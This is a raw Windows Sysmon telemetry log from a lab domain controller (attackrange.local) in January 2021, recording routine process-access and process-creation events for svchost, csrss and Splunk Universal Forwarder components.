13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.650{59A5CD1D-93D9-6005-DF04-00000000A301}51043416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 